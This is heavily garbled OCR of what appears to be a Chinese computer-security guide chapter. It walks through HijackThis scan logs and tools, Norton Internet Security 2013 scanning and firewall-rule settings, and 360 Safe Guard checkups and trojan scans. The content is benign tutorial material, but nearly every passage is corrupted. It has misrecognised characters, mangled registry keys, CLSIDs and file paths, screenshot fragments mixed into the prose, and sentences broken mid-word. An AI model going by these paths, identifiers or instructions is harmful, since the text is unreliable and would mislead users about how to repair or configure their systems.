Detailed information on item O2: 
A BHO (Browser Helper Object) is a specially crafted program 
that integrates into IE, and has virtually unlimited access rights 
on your system. Though BHO's can be helpful (like the Google 
Toolban, hijackers often use them for malicious purposes such 


as tracking your online behaviour displaying popup ads etc, 


(Action taken: Registry key and CLSID key are deleted, BHO dl 
file i's deleted.) 


单 击 “ 确 定 ” 按 钮 。 
STEP07:” 查看 提示 信息 


Fix 1 selected items? This will permanently delete and/or repair 


” what you selected. 


单 击 按钮 ， 对 所 选项 目 进行 修复 。 
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STEP04: 修复 


重 Trend Micro HijackThis - v2.0.4 


Below are the results of the HijackThis scan. Be careful what you delete with the 'Fix 
checked' button. Scan results do not determine whether an item is bad or not. The 
best thing to do is to ‘AnalyzeThis' and show the log file to knowledgeable folks， 


: Rising Web Helper 一 HE 034B-471A-8908-5S98ABA93B24B} — i: i | 
bHU: Lynec Llick to Ls 1Ba UDA- LF- LE DECOAedEIE DOUSUAS -LCL \trogram ) 

: Ad-Aware Security Fe - {6c9Ta91le-4524-4019-86af-2aa2d56Tbf5c} - C:\Program 

: XurlLeiEHD - {889D2FEB-5411-4565-8998-1DD2C5261283}】 - D:\ 安 装 \BHO\XunleiBHOT. 2. 1 三 

: URLRedirectionBHD - {B4F3A335-0FE21-4959-BA22-42B3008E02FF} — C:"\PROGRA 1‘\MICRO: 

: Safellon Class -~ {B69F34DD-F0F9-42DC-9EID-9571837DAB88D} - D:\Program Files\360\:— 


: 中 国 工商 银行 BHD - {BB4491A2-D11A-4c6b-91C0-B53246A3122B} - C:\Program Files\ICI 
: QQAMiniDLBHOHelper - {C9CT334B-5657-41el-8F79-FBAMCECADSF4} - C:\Program Files\( 
: Microsoft SkyDrive Pro Browser Helper — {DO498F0A-45B7T-42AE-AQAA-ABA4G3DBNSBF} 
: hccountProtect — {DDD362CF-523B-4BC9-8FDC-58F93BBBC945} -~ C:\Users\Administrate 
站 03 - Toolbar: Ad-Aware Security Add-on - {6c97a91le-4524-4019-86af-2aa2d56TbfSe} - C:\Prot 
]04 - HHINM'.. \Run: [InterFass3000 ICBC] C:\Program Files\ICBCFEbankTools\Feitian-InterPass’ 
04 - HIM'.. : [ShTray] “C:\Program Files\Spybot - Search & Destroy 2\SDTray. exe” 
-04 - WEIM'.. : [360Safetray] “D:\Program Files\360\360safe\safemon\360tray. exe” /stari 
04 - HM.. : [SystemTray] SysTray. Exe 

04 - HHIM.. : [BaidukAnTray] “C:\Program Files\Baidu\Baiduhn\l. 1.0. 489\BaiduinTray. ext 
04 - HHIM.. : [木马 清除 专家 ] D:\ 安 装 \ 林 马 清除 专家 2014\mmqczj. exe 

口 04 - KM .Run: [Windows 木 马 防火 墙 ] C:\ftc2010\Trojanwall. exe 

04 - HIM.. : [Ad-Aware Browsing Protection] “C:\ProgramData\Ad-hware Browsing Protet 
“04 - HEM.. : [Search Protection] C:\ProgramData\Search Protection\SearchProtection. ¢ 
04 -ECWN. .ARun: [键盘 辅助 程序 (禁止 后 可 能 导致 无 法 输入 中 文 ) ] WW MuserTemp\380zip$Temp\3E 
04 -~ HKCU\. .RunDnce: [adawarebp] reg.exe delete "HECU\Software\AppDataLow\Software\adaw: 
了 ]04 - HKCWN.. ‘RunDnce: [adawarebp_XF] reg, exe delete “HECI\Software\adawarebp” /f 汪 
MNd -~ HMISAS-1-S-194 MRun: [Sidohoar] NPrnoromRil oc Windawe Si daharSi hohoar ave fantnRnmn 


Scan & fix stuff Other stuff 
AnalyzeThis 
aerns | Info... | Config... | 
Main Menu | 


Add checked to ignorelist | 


单 击 “|nfo on selected 
tem" I 


STEPOG: a le) 

ME- IT EUS tetr ar . Fier 
HEIM'. . ‘Run. 
HEILM'. . “Run.: 
HETMN. . “Run. 
HETM'. . “Run.: 
HETM'. . “Run: 


[SystemTray] Ses. Exe 

[Bai duasrnTrayr] “C:\Program Fi 
[木马 清除 专家 ] D: "安装 \ 本 马 清 
[Windows 本 马 防火 墙 ] C: “ftc201 
[hd-hware Browsine Proteetio 
HEIM'.. ‘Run: [Search Frotection] C: ‘Froers 
HECWN..“Run: [键盘 辅助 程序 【禁止 后 可 能 号 至 
HECUN. .RuanDnee: [adawarebp] reg. exe dele 
[04 - HECUN.. ‘RunDnece: [adawarebp NF] reg. exe de 
[1nd HHMISAS-1-cG-19 ARar [SiqoHhor] 人 PrneramPi 


Scan & fix stu 人 ff 


| |04 
| 04 
| |04 
| 104 
口 oa 
| |04 
| |04 


Analyze 


Info on selected item, ,, Main Me 


单 击 “ Fix checked ”按钮 。 
STEP08: 返回 扫描 窗口 


[Yindows 木 己 防 火 墙 ] C:\ftc2010\Trojanwall. exe 
[hd-hware Browsing Protection] “C:\Programlata\hd-hwar 
[Search Frotection] C:\ProeramData\Search Protection's 
[键盘 辅助 程序 【禁止 后 可 能 导致 无 法 划 六 中 文 ) ] WMuserTe 
: [adawarebp] reg. exe delete "HECU\Software\hpplatal 
[adawarebp NF] reg. exe delete "HECU\Softwarenadawa 
-GD—-19% Rn， [Sidahar] SPrnaramFil os Yindnws Sidohar\ die 


Fo checked | 


如 果 用 户 不 了 解 某 些 可 疑 项 目 是 否 需要 修复 , 则 单 击 
“AnalyzeThis ”按钮 ， 将 扫描 到 的 可 疑 内 容 发 送 到 
网 站 ， 让 其 帮助 分 析 。 


< 本 17 章 
系统 安全 防护 工具 


STEP09: 返回 扫描 窗口 STEP10: ”打开 程序 配置 窗口 


F-5238-4BC9-BFDC-58F93B6BC945】 - C:\Users\Ahdministratt 强 Trend Micro HijackThis - v2.0.4 
-on -~ {Bc9Tadle-4524-4019-B6af-2aa2d5BTbfi5c} - C: Prot ee 
BC] C:\Program Files"\ICBCEbankTools\Feitian-InterFass: 


pr am Files\Spybot - Search & Destroy 2‘SDTray. exe” mam | Tonorelist | _ MiscTools | 


‘Program Files\3B0\3B0safe\safemon\3B0tray, exe” /star1 Hei to re detect then Ulcs You Do php ode 

ray. Eye delete them from here, (AntivifosFrogramsmay detect HijackThis backups!) 
‘Froaeram Files\BaliduBaiduhn\l. 1.0. 439"BaiduhnTr ay. ext I eR et 
“安装 “水 乌 清除 专家 2014\mmgqeri. exe Ee 中 本 ee ' 
者 ] C: “ftc2010\Trojanwall. exe 

eg Frotection] “C:\Proeramlata\hd-hware Browsing Proter 

bn] Ci\Froaeramlata\Search FrotectionmSearchFrotection. 上 

止 后 可 能 导致 无 法 输 六 中 冯 ) ] WMuserTemp“3BD0zrip$Temp"3E 

eg. exe delete "HECU\Software\hpplataLow\Software\adaw: 

FP] ree. exe delete "HECU\Software\adawarebp" /Ef S, 

1 WPrasr omRilocd Windnwe Sidohar Sidohar eve fantaRur, 


-5can & fix stuff 


i li Scan Fix checkel 
i | Add checked to ignanelist = 
Into on selected item,,, 
| 


单 击 “Config...” 按 钮 。 团 单 击 “Backups” 加 匀 选 需 要 恢复 的 项 目 
按钮 ， 可 以 看 到 修 后 单 击 “Restore "按钮 。 
复 的 项 目 列 表 。 


在 修复 之 后 暂时 不 要 清除 “Backups” 列 表 中 的 内 容 ， 待 系统 重启 且 运 行 正 
提示 。 常 后 再 清除 ， 以 免 造 成 不 必要 的 麻 烽 


STEP11:” 单 击 “Misc Tools” 按 钮 STEP12: ”打开 进程 管理 窗口 


蕊 Trend Micro HijackThis - v2.0.4 [La 雪 Trend Micro HijackThis - v2.0.4 


-Configuration -Configuration 


Main | Ignorelist | Backups | misc Toots Main | Ignorelist | Backups || MiscToots 
StartuplList (integrated: v1.52) -Process Manager 


Generate StartupList log | 厂 List also minor sections (ful) Running processes; (29) 
厂 Listempty sections (complete) C:\Windows\system32\taskhost,exe 


C:\Windows\system32\Dwm,.exe ra 
C:\Windows\Explorer.EXE 


C:\Program Files\ICBCEbankTools\Feitian-InterPass3000\certd_nps3000_ICBC.exe 
C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe 
| C:\Program Files\Baidu\BaiduAn\1, 1.0,489\BaiduAnTray.exe 
C:\ftc2010\Trojanwall,exe 
Open hosts fle manager “||opens an editor for the hosts file, C:\Program Files\Rising\RSD\popwndexe.exe 
De Ee 2 C:\Program Files\Rising\RSA\tray.exe 
a Nle cannot De removed Tom memory, C:\Program Files\Rising\RSAYsleak.exe 
Delete a file on reboot... | Windows can be setup to delete it when C:\Program Fies\Baidu\BaiduAn\1, 1,0, 489\BaiduAn.exe 
the system is restarted. C:\program files\common files\baidu\bddownload\105\bddownloader,exe 


Delete an NT ; Delete a Windows NT Service (023), USE C:\Program Files\SogouInput\Components\SGImeGuard\1.0.0.20\5GImeGuard.exe 
ele Service,.. WITH CAUTION! (WinNT4/2k/XP only) C:\Program Files\Micosoft Office\Office15\WINWORD.EXE 


Open ADS Spy... | Open the integrated ADS Spy utility to Ee Ss 
scan for hidden data streams, D: \Bin\TYXPlatform. exe a 


| Open a utiity to manage the items in the 
Open Uninstall Manager.,. Ra Canta ft Kill process | Re | | Badk Double-dick a file to view 


its properties 


FScan & Fix stuFF Other stuff 


一 Fix 一 一 Eee Info,,, | Back | 


上 dd checked to ignorelist 


用 户 可 以 使 用 进程 管理 、 单 击 “Open ”对 当前 运行 的 进程 进行 管理 。 
服务 管理 、 程 序 管理 等 多 种 process manager 
工具 。 按钮 。 
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STEP13: 返回 “Misc Tools” 窗 口 


有 Trend Micro HijackThis - v2.0.4 


-Configuration 


Main | Ignorelist | Backups || miscToots 


StartupList (integrated: v1.52) 


Generate StartupList log | 厂 List also minor sections (full) 
厂 List empty sections (complete) 


Ocess Opensa ocess manager, working 
Open process manager | Opt a procee man 
Open hosts fle manager “| Opens an editor for the hosts file. 


Ta Ifa file cannotbe removed from memory, 
.Delete a file on reboot,,, ;| |Windows can be setup to delete it when 
the system is restarted., 
a Windows NT Service (O23). USE 
WITH CAUTION! (WinNT4/2k/XP only) 
Open A Open the integrated ADS Spy utility to 
| scan for hidden data streams. 


Delete an NT service,.. 


| Open a utility to manage the items in the 
Open Uninst#ll Manager... Add/Remove Software list, 


单 击 “Delete a file on reboot” 按 钮 。 


STEP15: 返回 “Misc Tools” 窗 口 


过 Trend Micro HijackThis - v2.04 


-Configuration 
Main | Ignorelist | Backups | | Misc Tools 
StartupList (integrated: v1.52) 
Generate StartupListlog 厂 Listalso minor sections (full) 
厂 List empty sections (complete) 
System tools 
Opens a small process manager, working 
En much like the Task Manager 
Open hosts fle manager Opens an editor for the a file, 
Ifa file cannot be removed from memory, 
Delete a file on reboot... | Windows can be setup to delete it when 
the system is restarted. 
1 Delete a Windows NT Service (D23). USE 
Dc | WITH CAUTION! (WinNT4/2k/XP only) 
Open the integrated ADS Spy utility to 
OpenADsspy.. | scan for hidden data streams. 


| |Open a utility to manage the items in the 
| | Add /Remove Software list. 


单 击 “Open Uninstall Manager” 按 钮 。 


17:3.2 诺顿 网 络 安全 特警 


STEP14: 选择 需要 删除 的 文件 


Enter file to delete on reboot... 


b 
耳 i exe 
El hijackthis.log 


& tutuDisk (W;) _ 
昌 MSN 上 的 “我 : 


鱼网 阁 
i 4L8QD1ETPGK 
ja ZKG 


文件 名 (N): | 


选 定 需要 删除 的 文件 ， 单 击 “ 打 开 ” 按钮 ， 则 
系统 重启 时 将 其 删除 。 


STEP16: ”删除 程序 


世 Trend Micro HijackThis - v2.0.4 


-Configuration 


可 在 


-Add/Remove Programs Manager 


Here you can see the list of programs in the Add/Remove Software list in the Control Panel. You can edit the 
uninstall command or delete an item completely. Beware, restoring a deleted item is not possible! 


上 i a System 莱 容 负 党 Name; [2007 Office system 兼容 包 


| 
350 电 及 专家 8.6.6.0 Uninstall command: |MsiExec.exe /X{90120000-0020-0 


360 生 人 
了 Delete this entry Edit uninstal command | 
ACDSee Photo Manager 12 


ACDSee Pro 6 中 pen Add/Remove Software list 
Ad-Aware Security Add-on 
AIR 


Adobe Community Help 

Adobe Communiiy Help 

Adobe Flash Player 12 ActiveX 
Adobe Media Player 

Adobe Media Player 

Adobe Photoshop CS5 


Save list.., | Back | 


Other stuff 


一 一 一 


选中 一 个 项 日 O 
按钮 即 可 将 该 项 目 删除 。 


单 击 “ Delete this entry” 


“诺顿 网 络 安全 特警 2013” 简 体 中 文 版 是 为 Windows XP/2003/Vista/ 7/8 操作 系统 提供 
的 安全 防护 ， 提 供 主 动 式 行为 防护 ， 甚 至 可 以 在 传统 以 特征 为 基础 的 病毒 库 辨 认 出 前 束 早 


一 步 监 测 到 新 型 的 间 诬 程序 及 病 
狐 威 胁 。 
1. 配置 诺顿 网 络 安 全 特警 


当 “ 诺 顿 网 络 安全 特警 2013” 软 件 安装 完毕 之 后 ， 就 可 以 通 
具体 的 操作 步骤 


领略 其 新 囊 的 特性 。 
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过 配置 运行 


毒 。 它 可 每 阳 5 一 15 分 钟 提供 一 次 更 新 ， 以 检测 和 删除 最 


此 软件 ， 从 中 


< 第 17 章 


系统 安全 防护 工具 


STEP01:” 运行 诺顿 网 络 安全 特警 STEP02 软件 更 新 


Norton Internet Security 


Norton LiveUpdate 


正在 运行 LiveUpdate..， 


在 主 界面 左 侧 查看 单 击 “LiveUpdate” ”软件 正在 更 新 。 
计算 机 的 安全 状态 。 按钮 。 


STEP03: 对 系统 进行 扫描 STEP04: 打开 “安全 请 求 ” 对 话 框 


需要 的 操作 
X 检测 到 的 威胁 


检测 到 的 威胁 


- 关闭 该 功能 会 前 弱 对 系统 的 防护 . 
XScan 已 检测 到 . | Y | - 智能 防火 境 
压 痊 文件 "gqpcl1).exe" 中 存在 风险 已 检测 到 。 将 狗 除 压 综 文件 和 所 有 


内 容 ,包括 未 受 感 沁 的 文件 ， > 和 选择 持续 时 间 


压缩 文件 "qqpc.exe“ 中 存在 风险 已 检测 到 。 将 竹 除 压缩 文件 和 所 有 内 
容 ， 包括 来 溉 二 各 的 文件 . 


压 件 ” 盗 2[1].0( 可 获取 q 币 )rar 中 已 检测 到 。 将 测 

除 压 缩 文件 和 所 有 内 容 ， 包括 未 受 感染 约 文 件 。 

压缩 文件 kmspico( 最 简单 的 全 自动 win8-office2013 一 键 激活 工具 ) v7.0 . 

已 检测 中 榨 油 除 帮 娘 说 件 和 所 有 有 内容. 向 括 未 夸 咸 这 A 六 件 . 高 


已 隔 高 删除 的 文件 。 要 还 原 这 些 文件 ， 单 去 此 处 . 


也 Norton 


在 主 界面 单 击 “ 立 即 扫描 ”按钮 后 ， 对 系统 进行 扫 ”在 主 界面 单 击 “高 级 "按钮 ， 可 选择 开启 “智能 防 
描 。 扫 描 完成 后 可 对 检测 到 的 威胁 进行 修复 、 忽 略 ” 火 墙 ”, 单 击 “确定 ”按钮 即 可 开启 。 

或 排除 。 

STEP05: 打开“ 设置 ”窗口 STEP06: ”打开 “ 反 间 谍 软 件 ” 窗 口 


反 间 谍 软 件 


me + 和 T 


EE 打开 


a = Eee 打开 a 安全 风险 
和 定义 扫 搞 病毒 、 间 谋 软 件 、 广 可 黎 动 Ws 打开 贺 时 客 工具 
告 钦 件 以 及 其 他 内 容 的 方式 SONAR 主动 防护 ee J 开 ? 圆 间谍 软件 
ee SONAR 高 级 模式 Eee 三 动 贺 跟踪 软件 
实时 防护 设置 号 动 制 除 风险 EX 在 高 度 礁 定 讨 | 拔 写 程序 
在 我 专 开 寺 重 除 风险 EE 仅 在 高 度 效 定 时 加 远 得 访问 
显示 SONAR 胆 止 活 知 me 全 基于 于 图 广告 软件 
启用 引导 村 间 保 护 ee 关 问 3 图 玩笑 程序 

园 安全 评估 工具 

yj 误导 应 用 程序 
| 父母 控制 


= EE 二 二 


国 在 主 界面 单 击 “高级” 辆 在 “实时 防护 "界面 ” 勾 选 “安全 风险 类 别 " 下 的 复 选 框 ， 建 议 勾 选 所 有 
按钮 ， 然 后 单 击 "电脑 ” ”中 单 击 “配置 ”链接 。 ”选项 。 
选项 卡 。 
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ST IF 一 一 > 


工具 全 攻略 


信人 人 
STEP07: 切换 至 “网 络 ” 选 项 卡 STEP08: ”打开 “程序 规则 ”对 话 框 


入 侵 防 护 
自 定义 入 侵 设 置 


CloudSys Application 
DA 安装 \Rising\RawCloudSys.exe 


消息 保护 
自 定 义 和 保 护 电 子 起 件 
二 nternet Explorer\explore.exe 


QQ2013 
Ci\Program Files\Tencent\QQ\BiN\QQ,exe 


网 络 安全 设置 
受 保护 的 网 洛 系统 


智能 防火 墙 
和 Ns 防火 过 保护 设置 


对 各 网 络 防 贺 单 击 “ 智 能 防火 墙 " 界面 ” 国 在 程序 列表 中 可 修改 。 国 单 击 添加” 接 
护 选 项 进行 设置 。 ”中 的 “程序 规则 ”选项 。 每 个 程序 的 Internet 访 问 ” 钮 可 添加 其 他 程序 
a 控制 。 


STEP09: ”打开 “选择 应 用 程序 ”对 话 框 ”STEP10: ”打开 “规则 ”对 话 框 


这 些 规 则 可 确定 防火 墙 如 何 通过 360 下 载 管 理 
( D:\360\360Safe\LiveUpdate360,exe ) 处 理 连 接洽 试 。 列 要 中 越 先 前 的 规则 优先 级 索 高 。 


360 
360move_Sogouinput 1 2012/7/19 14:49 件 闪 厅 晶 : wR 360 下 载 管理 

95599 Certificate Tools 2013/5/6 11:55 ”文件 实 : 人 作 2 
ACD Systems 
Adobe 

alipay 

Baidu 
Common Files 
DVD Maker 
EVEREST 


选择 要 添加 的 程序 ， 单 击 “ 打 开 ” 按 钮 。 加 选中 需要 修改 的 程序 。 单 击 “修改 "按钮 。 
STEP11:” 打开 “修改 规则 ”对 话 框 STEP12: ”返回 “规则 ”对 话 框 


修改 规则 


这 些 规则 可 确定 防火 墙 如 何 通 过 360 下 载 管理 
( Di:\360\360Safe\LiveUpdate360.exe ) 处 理 连 接 岩 试 。 列 素 中 越 告 前 的 规则 优先 级 越 高 。 
是 阳 止 、 人 允许 还 是 监 皖 新 连接 ? 


司 允许 :允许 与 此 规则 匹配 的 连接 ， 
阻止 :不 允许 与 此 规则 匹配 的 连接 ， 加 360 下 载 管理 
监控 :记录 与 该 规则 匹配 的 连接 ， 这 使 您 身 移 些 控 该 规则 的 使 用 次 数 ， 允许 , 方向 : 入 站 /出 站 电 胶 : 任何 , 通信 : 任何 , 协议 : 全 部 


根据 提示 信息 修改 规则 ， 修 改 完成 后 单 击 “确定 ” ”如 果 要 删除 某 程 序 控 制 ， 则 在 选择 需要 删除 的 程序 
按钮 。 之 后 ， 单 击 “ 删 除 ” 按 钮 。 
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STEP13: 确认 信息 


规则 
是 否 要 删除 规则 “360 下 载 管 理 ”? 


单 击 “是 ”按钮 ， 即 完成 删除 操作 。 


STEP15: ”打开 “高 级 设置 ”页 面 


自动 文件 /打印 机 共享 控制 
自动 程序 控制 


激活 高 级 防护 功能 ， 
自 定 义 计算 机 用 于 查看 
网 页 的 端口 。 


STEBI: 


辆 单 击 “ 通 信 规 则 ” 栏 
目 右 侧 的 ” 本 和 链接 。 


返回 “高 级 设置 ” 页 面 


通信 规则 
非常 用 协议 
防火 墙 重 置 

隐 芒 阻止 的 端口 


自动 文件 /打印 机 共享 控制 
目 动 程序 控制 


如 果 要 对 防火 墙 进行 重新 设置 ， 
置 ”五 侧 的 “ 重 置 ”链接 。 


则 单 击 “防火 墙 重 


STEP14: 


-< 第 17 章 
系统 安全 防护 工具 


打开 “设置 ”对 话 框 的 “网 络 ” 选 项 卡 


入 侵 防护 
自 定 义 入 侵 设置 高 级 设置 
程序 规则 


| ”消息 保护 信任 控制 
阻止 所 有 网 阁 通信 


定义 和 犀 护 电子 邮件 


) ”网络 安全 设置 
受 保护 的 网 阁 系 统 


智能 防火 
防火 截 保护 设置 


单 击 “智能 防火 墙 ” 界面 中 “高 级 设置 ”栏目 右 侧 的 
“配置 ”链接 。 


STEP16: 打开 “通信 规则 ”对 话 框 


通信 规则 
这 些 规则 确定 防火 培 如 何 处 理 您 的 思议 上 所 有 程序 的 这 接 。 列 表 中 位 置 越 千 前 的 规则 优先 级 越 高 


默认 允许 特定 入 站 IC 
人 允许, 方向: 入 疲 电 用 | 任 且 退化 特 志 协议 :ICMP 


默认 允许 不 可 达到 入 站 KMP 目标 

人 允许, 方向 : 入 站 , 里 颈 : 任何 , 通信 将 十 , 协议 :ICMP 
默认 人 允许 特定 出 站 ICMP 

人 允许, 方向: 出 站 , 电脑 : 任何 , 通信 : 特定 , 协议 ;ICMP 
默认 允许 入 站 NetBIOS (共享 网 络 ) 

允许, 方向 : 入 站 , 电脑 : 本 地 子 网 , 通信 : 特定 , 协议 ; UDP 
默认 阻止 入 站 NetBIOS 

阻止 , 方向 : 入 站 , 电脑 : 任何 , 通信 : 特定, 协议 : UDP 
默认 允许 入 站 NetBlIOS 名 称 (共享 网 洛 ) 

人 允许 方向; 入 站 , 电脑 : 本 地 子 网 , 通信 : 特定 , 协议 ; UDP 


四 AlasDINS A Rr 


分 别 对 规则 进行 添加 、 修 改 、 删 除 、 上 移 和 下 移 操 作 。 


STEP18: ”打开 防火 墙 重 置 信息 提示 框 


Norton Internet Security Online 


设置 
重 设防 火 塘 将 重 设防 火 墙 设置 ag 任 控制 设置 )。 如 要 重 
设 ， 防火 培 梅 被 暂时 棕 用 几 种 钟 


是 否 要 和 紫 续 ? 


单 击 “ 是 ”按钮 ， 即 可 重新 设置 整个 防火 墙 。 
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ST IF 一 一 > 


工具 全 攻略 


信人 全 
STEP19: 返回 “设置 ”对 话 框 STEP20: 设置 Norton 身份 安全 


Norton ldentity Safe 


下 
a . 
/ 登录 或 


| 创建 帐户 


身份 安全 lL 
保护 身份 、 密 码 ¥ 给 入 电子 邮件 地 址 以 登录 到 您 的 诺顿 帐户 或 创建 
< 户 。 


一 个 


安全 上 网 
自 定 义 冲浪 设置 La 


在 “网 页 ”选项 卡 中 单 击 “ 身 份 安全 ”栏目 右 侧 的 ”对 Norton 身 份 进行 安全 设置 。 
“配置 ”链接 。 
STEP21: ”切换 至 “常规 ”选项 卡 


靛 默 模式 

全 屏 检 测 

检测 以 下 内 容 时 骤 用 安静 模式 : 
IMAPI 2.0 光盘 刻录 
媒体 中 心 TV 录制 


Re - 进行 诺顿 任务 、 性 能 监控 、 产 品 安全 性 的 设置 。 
使 用 部 分 默认 值 


sz | | Wm | 


2. 用 诺顿 网 络 安全 特警 扫描 程序 
在 所 有 设置 完毕 之 后 , 就 可 以 运用 设置 好 的 方式 实施 扫描 程序 ， 具体 的 操作 步骤 如 下 。 
STEP01: 打开 诺顿 网 络 安全 特警 STEP02: ”选择 扫描 方式 


Norton Internet Security 


Norton Internet Security 
设置 性 能 如 ”反馈 


LiveUpdate 


电脑 扫描 ”快速 扫描 “全面 系统 扫描 “ 自 定义 扫描 


扫 摘 易 受 感染 的 区 域 ， 扫 摘 整 台电 脑 或 对 驱动 亚 、 文 件 夫 或 磁盘 进行 自 定义 扫 搞 。 


单 击 “ 立 即 扫 朱 ”按钮 。 根据 实际 需要 选择 扫描 方式 (这 里 选 “ 快 速 扫描 ”) 。 
STEP03: 进行 快速 扫描 STEP04: ”查看 处 理 结果 


快速 扫描 
快速 扫描 


正在 扫描 易 受 感染 区 域 和 启动 文件 .… 
WPCSvc 


结果 摘要 


国 已 扫描 的 项 目 总 数 : 
2 个 嘴 演 Cookie 已 完全 解决 。 
国 检测 到 的 安全 风险 总 数 : 


国 已 解决 的 安全 风险 总 数 : 

CD > 

需要 注意 的 安全 风险 总 数 : 已 阿 高 利 除 的 文件 。 要 还 原 这 些 文件 ， 差 击 此 处 ， 
扫 择 完成 时 ， 我 的 电 肪 应该 如 果 您 认为 仍 存在 风险 ， 兰 去 此 处 。 


YNorton 


显示 扫描 信息 。 系统 自动 对 威胁 进行 处 理 ， 可 查看 结果 摘要 并 导出 
扫描 结果 ， 操 作 完成 后 单 击 “完成 ”按钮 。 
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其 实 不 论 是 流 让 软 件 还 是 间谍 软件 ， 都 会 


此 非常 有 必要 将 其 


系统 安全 防护 工具 


高 度 危 害 计算 机 系统 的 安全 性 和 稳定 性 ， 因 


请 除 。 由 于 不 同 的 间 讨 软件 和 流 谍 软件 的 设置 各 个 相同 ， 且 防 删 除 的 方 
法 也 越 来 越 复 森 ， 即 使 利用 反 间 诬 软 件 或 反 流氓 软件 也 不 能 保证 将 其 


成 功 清 除 ， 有 时 还 可 


能 会 因为 清除 流氓 软件 和 间谍 软件 而 导致 系统 出 现 问 题 ， 此 时 吏 需 要 请 教 专家 进行 手动 清 
除 。 读 者 只 有 学 会 了 消除 流 谍 软件 和 间 诬 软件 的 方法 ， 才 能 充分 保证 目 己 的 计算 机 系统 不 


家 恶意 软件 破坏 ， 避 免 球 客 入 侵 


17.3.3 300 安全 卫士 


如 今 网 络 上 各 种 间谍 软 件 、 悉 意 插件 和 流氓 软件 实在 太 多 ， 


市 来 的 损失 。 


这 上 坚 恶 意 软 件 或 者 收集 个 


人 隐私 或 频 发 广告 ， 或 让 系统 运行 缓慢 ， 让 用 户 兰 不 坊 言 。 使 用 免费 的 “360 安全 卫士 ” 


则 可 轻松 地 解决 这 个 问题 。 其 体 的 操作 步 
STEP01: 运行 360 安全 卫士 


电脑 专家 全 面 升 趣 艾 


EL 目 图 


手机 助手 软件 管家 


| 您 的 电脑 还 未 进行 过 体检 , 建议 立即 体检 ! 


a 进行 电脑 体检 可 以 全 面 喜 出 影响 老 脑 安全 和 人 性 能 鸭 问 是 并 化 一 生 收 复 


Be 


时 登录 我 的 360 帐 号 


前 流利 送 交 奖 职 分 ,10 纱 立即 开通 > > 
领取 特权 : 免费 2 元 彩票 “ 炫 动 360Logo 


回国 上 高 多 局 


电脑 体检 木马 查 杀 系统 修复 电脑 清理 优化 加 过 


立即 体检 


手机 助手 开机 0 过 究 这 则 到 器 


由 园 
疡 网 急救 煌 ”系统 急救 档 “文件 扮 碎 机 
人 成 功 连 演 至 云 安 全 中 心 。 9.3.0， 


下 载 并 安装 360 安 全 卫士 后 ， 双 击 桌 面 上 的 “360 安 
全 卫士 ”图 标 ， 进 入 其 操作 界面 。 


2001 会 


STEP03: 选择 “木马 查 杀 ” 


标签 


¢ 全 全 本 节 - 


人 三 外 四 | 


站 ”后 
| 安全 卫士 


= 六 
国 
软件 管家 


西国 A 高 多 局 


电脑 体检 = 系统 个 复 局 清理 优化 加 
国际 领先 理 杀 引擎 全 力 护航 上 网 安全 


回回 回国 


安全 工具 箱 


@ sey. wesvmai. 


a3 360 系 统 急救 箱 
Ej 强力 贡 亲 木马 ， 人 收复 泪 危 系统 


CAD 病 毒 专 亲 
ey 祷 准 误杀 CAD 病 毒 


加 :… | er 


热点 问题 修复 @2:; 
9 快 皖 方 式 异 常 

9 Word 尼 动 报错 

* 任务 管理 锅 异 常 

* QQ 面板 链接 打 不 开 

。 国标 显示 异 第 


有 快速 扫描 、 人 全盘 扫描 、 自 定义 扫描 三 种 扫描 方式 
可 供 选 择 。 单 击 “ 快 速 扫描 ”按钮 。 


又 如 下 。 


STEP02: 


对 计算 机 进 


行 体检 


如 兽 - 明 有 一 共 


回 转 高 多 局 


电脑 体检 木马 查 杀 系 综 修复 电脑 清理 优化 加 这 


前 注册 送 欧 奖 积分 ,10 秒 立即 开通 > > 
领取 符 权 : 免费 2 元 箭 票 | 炫 动 360Logo 


以 下 18 项 没有 问题 


5D 改 障 检测 ( 检测 系统 、 软 件 是 否 有 故障 ) 


# ”安全 卫士 自我 保护 已 开启 
s- 看 片 安全 防护 已 开启 
-网 购 安 全 防 芒 已 开局 

*- 嫂 索 安全 防护 已 开启 

#” 孝 件 安全 防护 已 开启 

s#- 网络 安全 防护 已 开启 

#” 锭 盘 德 记录 保护 已 开启 

向- 文件 系统 防护 已 开局 


Woe 


断 网 仿 救 视 。 “系统 仿 救 避 。 文件 扮 碎 机 
正在 升级 备用 木马 库 66% 至 


关头 
© 
© 
4 
© 
© 
© 
© 
© 
© 
© 
© 
© 
EA 


型 二 二 全 了 过 已 开拓 


3360 安 全 卫 十 首次 运 J 了 J 时， 将 自动 对 当前 系统 进 
行 快速 扫描 ， 查 找 出 系统 所 存在 的 问题 。 


STEP04: ” 扫描 元 


扫描 已 完成 ， i 建议 您 立即 处 理 。 
共 提 控 8040 个 文件 ,0 个 注册 素 项 , 用 时 0 


风险 项 
V| 包含 木马 的 压缩 包 文件 
EX 新 建文 件 关 \ 是 寺 下 载 \Domain 明 小 子 注入 工具 .rar 


v|] 包含 木马 的 压缩 包 文件 


EN 新 建文 件 闪 \ 时 大 下 载 \qq 简 单 凑 2[ 


了 .0( 可 获取 q 而 ).rar 


扫描 结束 后 ， 可 针对 问题 进行 处 理 。 
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MW 


合 人 他 他 


工具 全 攻略 
选择 “系统 修复 ”选项 卡 


电脑 专家 全 面 升级 牙 


SA EE 


甲 隔 体 检 木马 查 条 里 萌 浅 至 优化 加 到 里 训 救 搓 手机 助手 软件 管 军 


STEPOS: 


WY 修 异 常 、 打 补丁 ， 让 您 的 电脑 时 刻 保 持 健康 ! 
[= 下 主页 已 锁定 修改 


婉 定 主页 防止 被 木马 悉 窟 签 改 。 
已 钠 定 为 : http://hao.360.cr 


* 修 芭 其 他 济 人 器 主页 读 此 了 解 
* IE 浏览 器 其 他 届 性 去 仁 
进一步 篇 决 您 电脑 的 杂 症 


系统 重 装 
安全 重 装 您 的 燥 作 系统 


A 琵 动 大 师 
智能 解决 您 的 8E 动 问题 


_。 痒 G 可 向 8 引 的 问题 ER 


文件 恢复 


9 。 电 访 径 第 出 现 营 异 完结 功 鱼 9 正 主 页 怠 板 改 快速 找 回 您 丢失 的 文件 


上 网 喜 污 报错 9 ”右键 菜单 这 英文 


。 图 标 旦 示 异 党 es 本 地 连接 图 标 丢失 


规 修 复 ” 可 对 一 些 恶意 插件 、 广 告 等 进行 检测 及 
而 “漏洞 修复 ”可 专门 检测 并 修复 系统 漏洞 。 
单 击 “漏洞 修 复 ” 按 钮 。 


STEP07: 选择 “电脑 清理 ”选项 卡 


电脑 体检 木马 音 浴 系统 检 怎 Cs 
自动 二 
